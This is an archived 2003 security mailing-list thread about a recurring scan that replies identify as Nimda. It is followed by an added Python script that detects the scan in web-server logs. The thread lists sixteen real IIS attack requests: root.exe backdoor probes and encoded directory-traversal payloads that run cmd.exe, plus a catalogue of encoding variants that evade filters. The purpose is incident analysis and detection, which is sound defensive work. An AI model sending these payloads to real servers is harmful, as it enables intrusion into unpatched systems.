Security Incidents mailing list archives
Re: Same sequence... Resolved
From: "Dejan Markovic" <dejanmarkovic () hotmail com>
Date: Tue, 2 Dec 2003 14:47:49 -0500
Hi Guys,

Thanks much to everyone. I am in the process of contacting the owners of the boxes in question, and yes, it does seem like the real thing, as the attacks are escalating. My boxes are totally patched and the logs all read 404. I'll keep you posted on the outcome. Talk to you later, and thanks once more.

Regards,
Dan

----- Original Message -----
From: "Henderson, Dennis K." <Dennis.Henderson () umb com>
To: "Dejan Markovic" <dejanmarkovic () hotmail com>; <INCIDENTS () securityfocus com>
Sent: Tuesday, December 02, 2003 7:26 AM
Subject: RE: Same sequence...

It's probably a real Nimda-infected host.

Dennis

-----Original Message-----
From: Dejan Markovic [mailto:dejanmarkovic () hotmail com]
Sent: Monday, December 01, 2003 2:02 PM
To: INCIDENTS () securityfocus com
Subject: Same sequence...

Hi Guys,

Sent this one to the wrong group the first time (thanks, J), so here goes. Does anyone know which tool is being used for this scan? Snort has been logging the same sequence of scans from various IPs to all web servers on my network, regardless of whether some are IIS and the others Apache. The data is included below.
====================================================================
(1)  WEB-IIS CodeRed v2 root.exe access
     GET /scripts/root.exe?/c+dir HTTP/1.0
(2)  WEB-IIS CodeRed v2 root.exe access
     GET /MSADC/root.exe?/c+dir HTTP/1.0
(3)  WEB-IIS cmd.exe access
     GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(4)  WEB-IIS cmd.exe access
     GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
(5)  WEB-IIS unicode directory traversal attempt
     GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(6)  WEB-FRONTPAGE /_vti_bin/ access
     GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(7)  WEB-IIS _mem_bin access
     GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(8)  WEB-IIS unicode directory traversal attempt
     GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(9)  WEB-IIS unicode directory traversal attempt
     GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(10) WEB-IIS cmd.exe access
     GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(11) WEB-IIS unicode directory traversal attempt
     GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(12) WEB-IIS unicode directory traversal attempt
     GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(13) WEB-IIS cmd.exe access
     GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(14) WEB-IIS cmd.exe access
     GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(15) WEB-IIS cmd.exe access
     GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
(16) WEB-IIS cmd.exe access
     GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
====================================================================

The whole scan takes from 2 seconds to under a minute in some cases, but there are always 16 requests in the same order. Sorry if this has already been on the list, and thanks.
Regards,
Dan
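Added here as an example and not part of any message in the thread: a Python script that picks the 16-request probe sequence listed above out of web-server access logs. It assumes the logs are in Apache Common Log Format (an assumption; IIS would need a different regex), and its sample log lines are constructed, not captured. The 16 URIs are copied from the Snort alerts in the order Dan reports them. The decoder percent-decodes repeatedly, so the %255c, %%35c and %25%35%63 variants all collapse to a backslash, and it maps the four %c0/%c1 byte pairs the probes use in place of a path separator to '/' or '\' so that every variant normalizes to the same plain path. Per source IP it reports whether the full 16-request sequence was seen and, following Dan's remark that a patched box answers 404, whether any of these requests drew a 2xx response, which is the case that needs attention.

```python
"""Detect the 16-request Nimda-style probe sequence in Common Log Format logs.

Added example, not code from the original thread.  Log format (Apache CLF) is
an assumption; the sample log lines at the bottom are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# The 16 request URIs from the Snort alerts in the thread, in the order observed.
NIMDA_PROBE_PATHS = [
    "/scripts/root.exe?/c+dir",
    "/MSADC/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/d/winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
]

# Byte pairs the probes use where a path separator belongs.  urllib would
# treat them as invalid UTF-8, so they are mapped explicitly after decoding.
OVERLONG_SEPARATORS = {
    b"\xc0\xaf": b"/",   # %c0%af, overlong encoding of '/'
    b"\xc0\x2f": b"/",   # %c0%2f, %c0 followed by a decoded '/'
    b"\xc1\x9c": b"\\",  # %c1%9c, overlong encoding of '\'
    b"\xc1\x1c": b"\\",  # %c1%1c
}

# Apache Common Log Format: ip ident user [time] "METHOD uri PROTO" status size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)


def normalize_uri(raw: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (defeats %25xx double encoding and the %%35c
    trick) and collapse the overlong separators, so every traversal variant
    ends up as the same plain, lower-cased path with '\\' mapped to '/'."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        for bad, good in OVERLONG_SEPARATORS.items():
            decoded = decoded.replace(bad, good)
        if decoded == data:
            break
        data = decoded
    return data.decode("latin-1").replace("\\", "/").lower()


def is_nimda_probe(uri: str) -> bool:
    """True for the root.exe backdoor and cmd.exe traversal requests, however encoded."""
    path = normalize_uri(uri)
    return path.endswith("root.exe?/c+dir") or path.endswith("/winnt/system32/cmd.exe?/c+dir")


def analyze(log_lines):
    """Group probe requests by client IP.  Each report holds the probe URIs in
    the order seen, whether they equal the full 16-request sequence, and any
    probe that drew a 2xx answer (a patched box answers 404, as in the thread)."""
    per_ip = defaultdict(lambda: {"probes": [], "hits": []})
    for line in log_lines:
        m = CLF_RE.match(line)
        if not m or not is_nimda_probe(m["uri"]):
            continue
        rec = per_ip[m["ip"]]
        rec["probes"].append(m["uri"])
        if m["status"].startswith("2"):
            rec["hits"].append(m["uri"])
    for rec in per_ip.values():
        rec["full_sequence"] = rec["probes"] == NIMDA_PROBE_PATHS
    return dict(per_ip)


# Constructed sample log: one host running the full sequence against a patched
# server (all 404), one benign request, and one single probe that got a 200.
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Dec/2003:13:58:{i:02d} -0500] "GET {p} HTTP/1.0" 404 275'
    for i, p in enumerate(NIMDA_PROBE_PATHS)
] + [
    '198.51.100.7 - - [01/Dec/2003:13:59:01 -0500] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.9 - - [01/Dec/2003:13:59:30 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, rep in analyze(SAMPLE_LOG).items():
        print(ip, len(rep["probes"]), "probe(s); full 16-request sequence:",
              rep["full_sequence"], "; answered 2xx:", rep["hits"])
```

Run against real logs by replacing SAMPLE_LOG with the lines of an access log; an IP with full_sequence true and an empty hits list is the case Dan describes (a scanning host hitting a patched server), while any URI in hits means a request for cmd.exe or root.exe was served and that server should be treated as compromised rather than merely probed.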
Current thread:
- Same sequence... Dejan Markovic (Dec 01)
- Re: Same sequence... James C. Slora Jr. (Dec 02)
- <Possible follow-ups>
- RE: Same sequence... Henderson, Dennis K. (Dec 02)
- Re: Same sequence... Dejan Markovic (Dec 02)
- Re: Same sequence... Resolved Dejan Markovic (Dec 02)